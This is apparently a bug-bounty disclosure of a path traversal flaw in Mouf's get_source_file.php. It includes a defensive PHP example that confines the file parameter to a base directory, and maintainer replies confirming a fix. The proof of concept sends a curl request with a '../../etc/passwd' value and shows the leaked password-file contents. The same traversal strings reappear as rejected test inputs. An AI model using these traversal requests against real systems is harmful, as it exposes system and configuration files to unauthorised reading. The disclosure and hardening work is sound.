Path Traversal in thecodingmachine/mouf

Valid

Reported on

May 6th 2021


✍️ Description

Mouf is vulnerable to path traversal in mouf/mouf/src/direct/get_source_file.php because it doesn't sanitize user-supplied parameters, as shown below.
Vulnerable variable: file
Method: GET
The $file variable is built from user-supplied data, and a file is then opened using that user-supplied value.

🕵️‍♂️ Proof of Concept

Install Mouf using Composer
Send a request with curl

curl 'localhost/mouf_test/vendor/mouf/mouf/src/direct/get_source_file.php?selfedit=true&file=../../../../../../../etc/passwd'

Observe the response

Error, invalid file nameroot:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
...

💥 Impact

By manipulating variables that reference files with “dot-dot-slash (../)” sequences and their variations, or by using absolute file paths, it may be possible to access arbitrary files and directories stored on the file system, including application source code or configuration, and critical system files.
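
An added example, not Mouf's code or the upstream fix: one way to confine a `file` request parameter to a base directory in PHP. The response above prints an error string and still returns the file contents, so a caller has to stop on a failed check rather than only report it; `resolveInsideBase` and the temporary directory tree are hypothetical and constructed for the demonstration.

```php
<?php
declare(strict_types=1);

// Hypothetical helper for illustration; not part of Mouf.
// Returns the canonical path of $userPath if it is a file under $baseDir, else null.
function resolveInsideBase(string $baseDir, string $userPath): ?string
{
    // realpath() throws on NUL bytes in PHP 8, so reject them (and empty input) first.
    if ($userPath === '' || strpos($userPath, "\0") !== false) {
        return null;
    }
    $base = realpath($baseDir);
    if ($base === false) {
        return null;
    }
    // realpath() collapses "../" and resolves symlinks; it returns false for missing targets.
    $real = realpath($base . DIRECTORY_SEPARATOR . $userPath);
    if ($real === false || !is_file($real)) {
        return null;
    }
    // Compare against the base plus a trailing separator so "/srv/app-old" never matches "/srv/app".
    $prefix = rtrim($base, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    return strncmp($real, $prefix, strlen($prefix)) === 0 ? $real : null;
}

// Constructed sample tree: one file inside the allowed directory, one just outside it.
$root = sys_get_temp_dir() . '/pt_demo_' . bin2hex(random_bytes(4));
mkdir($root . '/src', 0700, true);
file_put_contents($root . '/src/Ok.php', "<?php // constructed sample\n");
file_put_contents($root . '/secret.txt', "constructed secret\n");

$cases = [
    'Ok.php'                          => true,
    '../secret.txt'                   => false,
    '../../../../../../../etc/passwd' => false,
    '/etc/passwd'                     => false,
];
foreach ($cases as $input => $expectAllowed) {
    $resolved = resolveInsideBase($root . '/src', $input);
    if (($resolved !== null) !== $expectAllowed) {
        throw new RuntimeException("unexpected result for: $input");
    }
    printf("%-34s %s\n", $input, $resolved === null ? 'rejected' : 'allowed');
}
// In a request handler: on null, send an error status and exit before any file is read.
```
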

David Négrier
7 months ago

Maintainer


Hey! The vulnerability is completely valid. I'm having an issue with Huntr.dev, I cannot mark the vulnerability as valid in the UI, but it definitely is. I opened an issue in Huntr.dev bug tracker, and I merged the PR directly upstream and tagged a new release.

Thanks a lot!

hitisec
7 months ago

Researcher


Thanks!